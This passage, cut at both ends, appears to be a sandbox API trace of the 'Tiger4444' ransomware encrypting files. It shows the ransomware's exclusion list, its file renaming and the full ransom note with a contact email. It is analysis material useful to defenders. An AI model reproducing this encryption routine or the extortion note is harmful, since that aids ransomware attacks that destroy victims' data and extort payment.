param_1=0x2fac030, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\i386\\nxquery.cat.Tiger4444") returned 56 [0052.818] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.cat" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.cat"), lpNewFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.cat.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.cat.tiger4444"), dwFlags=0x1) returned 1 [0052.819] InterlockedExchangeAdd (in: Addend=0xc6f5e8, Value=9872 | out: Addend=0xc6f5e8) returned 110432 [0052.819] InterlockedExchangeAdd (in: Addend=0xc6f5f4, Value=8 | out: Addend=0xc6f5f4) returned 1040 [0052.819] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x2fadd50 | out: lpFindFileData=0x2fadd50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3b017f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b017f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x5d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nxquery.inf", cAlternateFileName="")) returned 1 [0052.819] lstrcmpiW (lpString1="nxquery.inf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.819] lstrcmpiW (lpString1="nxquery.inf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.819] lstrcmpiW (lpString1="nxquery.inf", lpString2="Tiger4444.exe") returned -1 [0052.819] lstrcmpiW (lpString1="nxquery.inf", lpString2=".") returned 1 [0052.819] lstrcmpiW (lpString1="nxquery.inf", lpString2="..") returned 1 [0052.819] lstrcmpiW (lpString1="nxquery.inf", lpString2="windows") returned -1 [0052.819] lstrcmpiW (lpString1="nxquery.inf", lpString2="bootmgr") returned 1 [0052.819] lstrcmpiW (lpString1="nxquery.inf", lpString2="pagefile.sys") returned -1 [0052.819] lstrcmpiW (lpString1="nxquery.inf", lpString2="boot") returned 1 [0052.819] lstrcmpiW (lpString1="nxquery.inf", lpString2="ids.txt") returned 1 [0052.819] lstrcmpiW (lpString1="nxquery.inf", lpString2="NTUSER.DAT") returned 1 [0052.819] lstrcpyW (in: lpString1=0x2fae8e6, lpString2="nxquery.inf" | out: lpString1="nxquery.inf") returned="nxquery.inf" [0052.819] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.inf", dwFileAttributes=0x0) returned 1 [0052.819] lstrlenW (lpString="nxquery.inf") returned 11 [0052.819] lstrlenW (lpString="Tiger4444") returned 9 [0052.819] lstrcmpiW (lpString1="query.inf", lpString2="Tiger4444") returned -1 [0052.819] lstrlenW (lpString=".dll") returned 4 [0052.819] lstrcmpiW (lpString1=".inf", lpString2=".dll") returned 1 [0052.819] lstrlenW (lpString=".lnk") returned 4 [0052.819] lstrcmpiW (lpString1=".inf", lpString2=".lnk") returned -1 [0052.819] lstrlenW (lpString=".ini") returned 4 [0052.819] lstrcmpiW (lpString1=".inf", lpString2=".ini") returned -1 [0052.820] lstrlenW (lpString=".sys") returned 4 [0052.820] lstrcmpiW (lpString1=".inf", lpString2=".sys") returned -1 [0052.820] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.inf" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.inf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.820] QueryPerformanceFrequency (in: lpFrequency=0x2fabd20 | out: lpFrequency=0x2fabd20*=100000000) returned 1 [0052.820] QueryPerformanceCounter (in: lpPerformanceCount=0x2fabd28 | out: lpPerformanceCount=0x2fabd28*=14427286014) returned 1 [0052.820] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x2fabd80 | out: lpFileSize=0x2fabd80*=1495) returned 1 [0052.820] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0052.820] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0052.820] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8e0, lpName=0x0) returned 0x2ac [0052.821] MapViewOfFile (hFileMappingObject=0x2ac, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8e0) returned 0xbe0000 [0053.015] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0053.015] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0053.015] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0053.015] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0053.015] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0053.016] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0053.016] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0053.016] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0053.016] QueryPerformanceCounter (in: lpPerformanceCount=0x2fabd30 | out: lpPerformanceCount=0x2fabd30*=14446893266) returned 1 [0053.016] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0053.016] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0053.016] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0053.016] CloseHandle (hObject=0x2ac) returned 1 [0053.016] CloseHandle (hObject=0x2c8) returned 1 [0053.016] wsprintfW (in: param_1=0x2fac030, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\i386\\nxquery.inf.Tiger4444") returned 56 [0053.016] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.inf" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.inf"), lpNewFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.inf.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.inf.tiger4444"), dwFlags=0x1) returned 1 [0053.017] InterlockedExchangeAdd (in: Addend=0xc6f5e8, Value=1504 | out: Addend=0xc6f5e8) returned 120304 [0053.017] InterlockedExchangeAdd (in: Addend=0xc6f5f4, Value=196 | out: Addend=0xc6f5f4) returned 1048 [0053.017] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x2fadd50 | out: lpFindFileData=0x2fadd50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3b2895, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b2895, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x4eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NXQuery.sys", cAlternateFileName="")) returned 1 [0053.017] lstrcmpiW (lpString1="NXQuery.sys", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.017] lstrcmpiW (lpString1="NXQuery.sys", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.017] lstrcmpiW (lpString1="NXQuery.sys", lpString2="Tiger4444.exe") returned -1 [0053.017] lstrcmpiW (lpString1="NXQuery.sys", lpString2=".") returned 1 [0053.017] lstrcmpiW (lpString1="NXQuery.sys", lpString2="..") returned 1 [0053.017] lstrcmpiW (lpString1="NXQuery.sys", lpString2="windows") returned -1 [0053.017] lstrcmpiW (lpString1="NXQuery.sys", lpString2="bootmgr") returned 1 [0053.017] lstrcmpiW (lpString1="NXQuery.sys", lpString2="pagefile.sys") returned -1 [0053.017] lstrcmpiW (lpString1="NXQuery.sys", lpString2="boot") returned 1 [0053.018] lstrcmpiW (lpString1="NXQuery.sys", lpString2="ids.txt") returned 1 [0053.018] lstrcmpiW (lpString1="NXQuery.sys", lpString2="NTUSER.DAT") returned 1 [0053.018] lstrcpyW (in: lpString1=0x2fae8e6, lpString2="NXQuery.sys" | out: lpString1="NXQuery.sys") returned="NXQuery.sys" [0053.018] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\NXQuery.sys", dwFileAttributes=0x0) returned 1 [0053.018] lstrlenW (lpString="NXQuery.sys") returned 11 [0053.018] lstrlenW (lpString="Tiger4444") returned 9 [0053.018] lstrcmpiW (lpString1="Query.sys", lpString2="Tiger4444") returned -1 [0053.018] lstrlenW (lpString=".dll") returned 4 [0053.018] lstrcmpiW (lpString1=".sys", lpString2=".dll") returned 1 [0053.018] lstrlenW (lpString=".lnk") returned 4 [0053.018] lstrcmpiW (lpString1=".sys", lpString2=".lnk") returned 1 [0053.018] lstrlenW (lpString=".ini") returned 4 [0053.018] lstrcmpiW (lpString1=".sys", lpString2=".ini") returned 1 [0053.018] lstrlenW (lpString=".sys") returned 4 [0053.018] lstrcmpiW (lpString1=".sys", lpString2=".sys") returned 0 [0053.018] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x2fadd50 | out: lpFindFileData=0x2fadd50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3b2895, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b2895, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x4eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NXQuery.sys", cAlternateFileName="")) returned 0 [0053.018] FindClose (in: hFindFile=0xc72f08 | out: hFindFile=0xc72f08) returned 1 [0053.018] lstrcpyW (in: lpString1=0x2fae8e6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.018] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\i386\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0053.019] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0053.019] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0053.019] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0053.020] CloseHandle (hObject=0x2c8) returned 1 [0053.020] CloseHandle (hObject=0x260) returned 1 [0053.020] GetCurrentThreadId () returned 0x9e0 [0053.020] RtlInterlockedPopEntrySList (in: ListHead=0xc5a728 | out: ListHead=0xc5a728) returned 0x0 [0053.020] GetCurrentThreadId () returned 0x9e0 [0053.020] WaitForMultipleObjects (nCount=0x0, lpHandles=0x2fadfa0*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0053.020] RtlInterlockedPopEntrySList (in: ListHead=0xc5a728 | out: ListHead=0xc5a728) returned 0x0 [0053.020] RtlInterlockedFlushSList (in: ListHead=0xc5a728 | out: ListHead=0xc5a728) returned 0x0 [0053.020] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5a720 | out: hHeap=0xc50000) returned 1 [0053.020] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc6f5d8 | out: hHeap=0xc50000) returned 1 [0053.020] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8c9a0 | out: hHeap=0xc50000) returned 1 [0053.020] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89de8 | out: hHeap=0xc50000) returned 1 [0053.020] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752e8 | out: hHeap=0xc50000) returned 1 [0053.020] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 Thread: id = 17 os_tid = 0xc04 [0053.161] RtlInterlockedPopEntrySList (in: ListHead=0xc66628 | out: ListHead=0xc66628) returned 0xc66328 [0053.161] lstrcpynW (in: lpString1=0x31ae9c8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903" [0053.161] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d570 | out: hHeap=0xc50000) returned 1 [0053.161] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66320 | out: hHeap=0xc50000) returned 1 [0053.161] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903" [0053.161] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\" [0053.161] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.BFC0E91B00AE8A0620D3" [0053.161] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0053.161] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903" [0053.161] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\" [0053.161] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.BFC0E91B00AE8A0620D3" [0053.162] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0053.162] ReadFile (in: hFile=0x260, lpBuffer=0x31ac5b0, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x31ac5ac, lpOverlapped=0x0 | out: lpBuffer=0x31ac5b0*, lpNumberOfBytesRead=0x31ac5ac*=0x3d4, lpOverlapped=0x0) returned 1 [0053.162] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc75248 [0053.162] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc7d350 [0053.162] lstrlenA (lpString="a0 4V dp nm e7 7W Ey gE dV 9i ic Zb au WZ my rm\r\nCd 19 3r AN k0 3D 2P LS Rx 6n rJ N8 TT 9v Wj GN\r\ndO l/ Tl Ds Bk QE 3q hn 58 yr Xg sN A1 eq 93 ki\r\noN vX pz 04 c1 eh Vl RF ot Xw 04 Lj /f qC rB 5P\r\nnu Wm aZ vl 5i nK 51 ON 1I Xz hM Hm p0 Vo zQ UR\r\n2d FC 2d Jo Dy fp KS ub Tp +w NK or 9V Fg xI 7f\r\nEf qM N8 3J 1T 8+ DD Gc EX cO 9t Dp KG PK Ib gd\r\nvU 5C qf 5k iv EE 6q 8t vk 2r WR K/ rT 4d xS KW\r\nBP zZ m3 Bt LD 1z In Mg 4l 3T br 9b Ht OJ 5Y Wf\r\nT+ D6 q7 +d pZ o6 aJ TO Ny cF qx aM lT GX 6s KR\r\nG8 yN uk BR 82 5E SK b2 B9 Qv Jn jq 2O hl I6 bj\r\nAO rC AM zM 00 HV 6D Ar 7m dc HI zQ rT hm qM KD\r\nQu NB gt hX 4g 8S 47 tc 0Y KP v0 sf +G Wm sm CV\r\nH4 5f cM qi /+ gt XB 0X 77 n0 vI Nv Lg fK AA dx\r\nRJ 3I uf RX yF O3 kU El hD 1v f6 jj Bh b9 kq aJ\r\nKe Wo qh K1 zI Rp sz 7i uV 57 Px Ce G2 P2 Ir GA\r\nOw mo GT AB OZ h1 nV mv tj Aw vo Cf Vp kx Kl EW\r\n+i N0 oo d2 33 LH BP Xn Ht lv mA iP kN fG kV kK\r\nen rK fv ln N0 Yd Bd di 51 sb d6 oX sC hv 71 Xw\r\nFk RE X1 vl yY YR L5 zm 1Y KY lN Q6 Qk K5 Ps Ss\r\n02 8y Pq 8Y Ve 4r eQ vY sZ H8 +M 9V U9 Qm Ih 4X\r\nyQ 4n 9T NS sl s= ") returned 1047 [0053.162] lstrlenA (lpString="{{ID}}") returned 6 [0053.162] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0053.162] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x74c) returned 0xc921d0 [0053.162] CloseHandle (hObject=0x260) returned 1 [0053.162] GetLastError () returned 0x0 [0053.162] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903") returned 99 [0053.162] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.162] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\*", lpFindFileData=0x31ade78 | out: lpFindFileData=0x31ade78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5af7cc2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x5b71e56, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83c2c591, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73048 [0053.162] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.162] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.162] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0053.162] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.162] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x31ade78 | out: lpFindFileData=0x31ade78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5af7cc2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x5b71e56, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83c2c591, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.163] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.163] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.163] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0053.163] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.163] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.163] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x31ade78 | out: lpFindFileData=0x31ade78*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83c2c591, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83c2c591, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83c52611, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.163] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.163] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.163] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x31ade78 | out: lpFindFileData=0x31ade78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5afa3b9, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7c375100, ftLastAccessTime.dwHighDateTime=0x1d1deb2, ftLastWriteTime.dwLowDateTime=0x7c375100, ftLastWriteTime.dwHighDateTime=0x1d1deb2, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE.txt", cAlternateFileName="")) returned 1 [0053.163] lstrcmpiW (lpString1="LICENSE.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.163] lstrcmpiW (lpString1="LICENSE.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.163] lstrcmpiW (lpString1="LICENSE.txt", lpString2="Tiger4444.exe") returned -1 [0053.163] lstrcmpiW (lpString1="LICENSE.txt", lpString2=".") returned 1 [0053.163] lstrcmpiW (lpString1="LICENSE.txt", lpString2="..") returned 1 [0053.163] lstrcmpiW (lpString1="LICENSE.txt", lpString2="windows") returned -1 [0053.163] lstrcmpiW (lpString1="LICENSE.txt", lpString2="bootmgr") returned 1 [0053.163] lstrcmpiW (lpString1="LICENSE.txt", lpString2="pagefile.sys") returned -1 [0053.163] lstrcmpiW (lpString1="LICENSE.txt", lpString2="boot") returned 1 [0053.163] lstrcmpiW (lpString1="LICENSE.txt", lpString2="ids.txt") returned 1 [0053.163] lstrcmpiW (lpString1="LICENSE.txt", lpString2="NTUSER.DAT") returned -1 [0053.163] lstrcpyW (in: lpString1=0x31aea90, lpString2="LICENSE.txt" | out: lpString1="LICENSE.txt") returned="LICENSE.txt" [0053.163] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt", dwFileAttributes=0x0) returned 1 [0053.163] lstrlenW (lpString="LICENSE.txt") returned 11 [0053.163] lstrlenW (lpString="Tiger4444") returned 9 [0053.163] lstrcmpiW (lpString1="CENSE.txt", lpString2="Tiger4444") returned -1 [0053.164] lstrlenW (lpString=".dll") returned 4 [0053.164] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0053.164] lstrlenW (lpString=".lnk") returned 4 [0053.164] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0053.164] lstrlenW (lpString=".ini") returned 4 [0053.164] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0053.164] lstrlenW (lpString=".sys") returned 4 [0053.164] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0053.164] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\license.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0053.164] QueryPerformanceFrequency (in: lpFrequency=0x31abe48 | out: lpFrequency=0x31abe48*=100000000) returned 1 [0053.164] QueryPerformanceCounter (in: lpPerformanceCount=0x31abe50 | out: lpPerformanceCount=0x31abe50*=14461748646) returned 1 [0053.164] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x31abea8 | out: lpFileSize=0x31abea8*=479) returned 1 [0053.165] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0053.165] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0053.165] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, 